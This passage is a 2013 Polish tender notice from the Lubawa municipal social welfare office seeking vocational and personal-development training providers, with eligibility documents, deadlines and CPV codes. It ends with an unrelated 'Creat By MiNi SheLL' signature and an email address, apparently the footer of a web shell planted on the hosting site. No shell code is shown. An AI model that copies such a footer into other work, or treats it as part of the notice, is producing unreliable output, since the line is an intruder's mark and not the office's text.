W celu potwierdzenia spełnienia warunku o którym mowa w pkt. 8 pkt. 2 ppkt. 2.1)                                     Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w zakresie niezbędnym do wykazania spełnienia warunku wiedzy                              i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem dat wykonania i odbiorców oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane należycie (np. pozytywne referencje od Zamawiających). 
Wymagane jest przeprowadzenie co najmniej 2 usług (warsztatów, treningów, poradnictwa, doradztwa)  o tematyce i zakresie porównywalnym z przedmiotem usługi 
w ramach poszczególnych części przedmiotu zamówienia. Wykaz usług wykonanych należy przedstawić na druku stanowiącym Załącznik nr 4  do Specyfikacji Istotnych Warunków Zamówienia (SIWZ). 
W celu potwierdzenia spełnienia warunku o którym mowa w pkt. 8 pkt. 2 ppkt. 2.2)                                     Wykaz osób - potwierdzający, że Wykonawca dysponuje lub będzie dysponował osobami posiadającymi odpowiednie wykształcenie, doświadczenie niezbędne do realizacji szkoleń                       w ramach usług będących przedmiotem zamówienia (wymagane jest aby wykładowcy/trenerzy biorący udział w realizacji pierwszej części przedmiotu zamówienia  posiadali  wykształcenie wyższe o kierunku zgodnym z tematyką prowadzonych warsztatów, treningów lub wykształcenie wyższe i specjalizację lub inne  uprawniające do prowadzenia w/w warsztatów, treningów,  porad oraz doświadczenie zawodowe - przeprowadzili co najmniej 2 usługi (treningi, warsztaty, kursów)  odpowiadające swoim rodzajem usługom stanowiącym zakres poszczególnych części przedmiotu zamówienia. Trenerzy zajęć praktycznych biorący udział biorący udział w realizacji drugiej i trzeciej części przedmiotu zamówienia muszą posiadać co najmniej wykształcenie średnie zgodne z tematyką prowadzonych szkoleń lub średnie i szkolenie kierunkowe lub inne uprawniające do prowadzenia szkoleń będących przedmiotem zamówienia oraz doświadczenie zawodowe - przeprowadzili co najmniej 2 usługi (kursy)  odpowiadające swoim rodzajem usługom stanowiącym zakres poszczególnych części przedmiotu zamówienia.
Wykaz osób będzie trzeba przedstawić na druku stanowiącym Załącznik Specyfikacji Istotnych Warunków Zamówienia (SIWZ) wraz z kserokopią dyplomów lub innych dokumentów, poświadczających posiadanie przez osoby prowadzące warsztaty, treningi, poradnictwo  w/w wykształcenia i doświadczenia. 
W przypadku zlecania części zamówienia podwykonawcom - oświadczenie w sprawie realizacji zamówienia przy współudziale podwykonawców stanowiące Załącznik do Specyfikacji Istotnych Warunków Zamówienia (SIWZ). 
Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające,                          że wykonawca nie zalega z opłacaniem podatków, lub, że uzyskał przewidziane prawem odroczenie lub rozłożenie na raty zaległych płatności lub o wstrzymaniu  w całości wykonania decyzji organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub  potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub o wstrzymaniu w całości wykonania decyzji organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Wyżej wymienione dokumenty mogą być złożone w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.

Do oferty należy dołączyć również Ramowy Program usługi - szkolenia - zgodnie 
z formularzem stanowiącym Załącznik nr 7  do Specyfikacji Istotnych Warunków Zamówienia (SIWZ) - dotyczy
Części 1:
Trening interpersonalny
Warsztaty kreowania wizerunku
Warsztaty aktywizacji zawodowej

Części 2:
Kurs na prawo jazdy kat B

Części 3
Kurs zawodowy Kucharz małej gastronomii
Kurs zawodowy Operator wózka widłowego
Kurs zawodowy Nowoczesny sprzedawca
Kurs zawodowy Opiekunka osób starszych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega sobie prawo zmiany okresu realizacji poszczególnych części przedmiotu zamówienia, w przypadku zmiany treści umowy o wsparcie realizacji zadania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gopslubawa.4bip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej Gminy Lubawa
Fijewo 73, 14 - 260 Lubawa
pok nr 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.07.2013 godzina 09:30, miejsce: Ośrodek Pomocy Społecznej Gminy Lubawa
Fijewo 73, 14 - 260 Lubawa
pok nr 17.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie publiczne Czas na aktywność realizowanego w ramach Programu Ministra Pracy i Polityki Społecznej Aktywne Formy Przeciwdziałania Wykluczeniu Społecznemu - edycja 2011-2015 p.n.Podmiot zatrudnienia socjalnego partnerem Ośrodka Pomocy Społecznej i Powiatowego Urzędu Pracy w realizacji kontraktów socjalnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Trening interpersonalny (grupowy) - dla 10 uczestników zadania.
Warsztaty kreowania wizerunku (grupowe).
Warsztaty aktywizacji zawodowej (grupowe)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs na prawo jazdy kat. B - dla 6 uczestników zadania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.41.12.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> USŁUGA EDUKACYJNA  I  SZKOLENIOWA W DZIEDZINIE ROZWOJU OSOBISTEGO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KUCHARZ MAŁEJ GASTRONOMII DLA 1 UCZESTNIKA ZADANIA.
OPERATOR WÓZKA WIDŁOWEGO DLA 2 UCZESTNIKÓW ZADANIA.
NOWOCZESNY SPRZEDAWCA DLA 1 UCZESTNIKA ZADANIA.
OPIEKUNKA OSÓB STARSZYCH DLA 3 UCZESTNIKÓW ZADANIA..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com